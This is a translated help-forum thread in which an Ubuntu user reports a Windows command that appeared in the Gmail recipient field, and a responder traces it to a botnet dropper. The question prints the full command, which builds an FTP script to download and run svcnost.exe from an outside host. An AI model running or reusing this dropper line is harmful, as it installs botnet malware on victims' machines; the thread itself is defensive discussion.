¿Cómo identificar si mi computadora con Linux fue pirateada?

Pregunta:

La PC de mi hogar suele estar encendida, pero el monitor está apagado. Esta noche llegué a casa del trabajo y encontré lo que parece un intento de pirateo: en mi navegador, mi Gmail estaba abierto (ese era yo), pero estaba en modo de redacción con lo siguiente en el campo TO :

md / c echo open cCTeamFtp.yi.org 21 >> ik & echo usuario ccteam10 765824 >> ik & echo binary >> ik & echo get svcnost.exe >> ik & echo bye >> ik & ftp -n -v -s: ik & del ik & svcnost.exe & exit echo Tienes propiedad

Esto me parece un código de línea de comandos de Windows, y el inicio md del código combinado con el hecho de que Gmail estaba en modo de redacción, hace evidente que alguien intentó ejecutar un comando cmd . Supongo que tuve suerte de no ejecutar Windows en esta PC, pero tengo otros que sí lo hacen. Esta es la primera vez que me pasa algo así. No soy un gurú de Linux y en ese momento no estaba ejecutando ningún otro programa aparte de Firefox.

Estoy absolutamente seguro de que yo no escribí esto y que nadie más estaba físicamente en mi computadora. Además, recientemente cambié mi contraseña de Google (y todas mis otras contraseñas) a algo como vMA8ogd7bv así que no creo que alguien haya pirateado mi cuenta de Google.

¿Lo que acaba de suceder? ¿Cómo puede alguien presionar el teclado en mi computadora cuando no es la vieja máquina Windows de la abuela la que ha estado ejecutando malware durante años, sino una nueva instalación reciente de Ubuntu?

Actualizar:
Permítanme abordar algunos de los puntos y preguntas:

  • Estoy en Austria, en el campo. Mi enrutador WLAN ejecuta WPA2 / PSK y una contraseña medianamente segura que no está en el diccionario; tendría que ser de fuerza bruta ya menos de 50 metros de aquí; no es probable que haya sido pirateado.
  • Estoy usando un teclado con cable USB, por lo que, nuevamente, es muy poco probable que alguien pueda estar dentro del alcance para piratearlo.
  • No estaba usando mi computadora en ese momento; simplemente estaba inactivo en casa mientras yo estaba en el trabajo. Es una nettop PC montada en un monitor, por lo que rara vez la apago.
  • La máquina tiene solo dos meses, solo ejecuta Ubuntu y no estoy usando software extraño ni visitando sitios extraños. Se trata principalmente de Stack Exchange, Gmail y periódicos. No juegos. Ubuntu está configurado para mantenerse actualizado.
  • No tengo conocimiento de que se esté ejecutando ningún servicio VNC; Ciertamente no he instalado ni habilitado uno. Tampoco he iniciado ningún otro servidor. No estoy seguro de si alguno se está ejecutando en Ubuntu de forma predeterminada.
  • Conozco todas las direcciones IP de la actividad de la cuenta de Gmail. Estoy bastante seguro de que Google no era una puerta de entrada.
  • Encontré un visor de archivos de registro , pero no sé qué buscar. ¿Ayudar?

Lo que realmente quiero saber es, y lo que realmente me hace sentir inseguro, es: ¿cómo puede alguien de Internet generar pulsaciones de teclas en mi máquina? ¿Cómo puedo prevenir eso sin ser todo un sombrero de papel de estaño al respecto? No soy un fanático de Linux, soy un padre que se ha metido con Windows durante más de 20 años y estoy cansado de eso. Y en los más de 18 años que llevo en línea, nunca he visto personalmente ningún intento de pirateo, así que esto es nuevo para mí.

Respuesta:

Dudo que tengas algo de qué preocuparte. Lo más probable es que haya sido un ataque de JavaScript que intentó realizar una descarga . Si le preocupa que esto suceda, comience a utilizar los complementos de NoScript y AdBlock Plus para Firefox.

Incluso visitando sitios confiables, no está seguro porque ejecutan código JavaScript de anunciantes externos que pueden ser maliciosos.

Lo agarré y lo ejecuté en una máquina virtual. Instaló mirc y este es el registro de estado … http://pastebin.com/Mn85akMk

Es un ataque automatizado que intenta que descargues mIRC y te unas a una botnet que te convertirá en un spambot … Hizo que mi VM se uniera y estableciera una conexión con varias direcciones remotas diferentes, una de las cuales es autoemail-119.west320.com .

Al ejecutarlo en Windows 7, tuve que aceptar el indicador de UAC y permitirle el acceso a través del firewall.

Parece haber toneladas de informes de este comando exacto en otros foros, y alguien incluso dice que un archivo torrent intentó ejecutarlo cuando se terminó de descargar … Sin embargo, no estoy seguro de cómo sería posible.

No lo he usado yo mismo, pero debería poder mostrarte las conexiones de red actuales para que puedas ver si estás conectado a algo fuera de la norma: http://netactview.sourceforge.net/download.html

Leave a Comment

Your email address will not be published.

Scroll to Top

istanbul avukat

-

web tasarım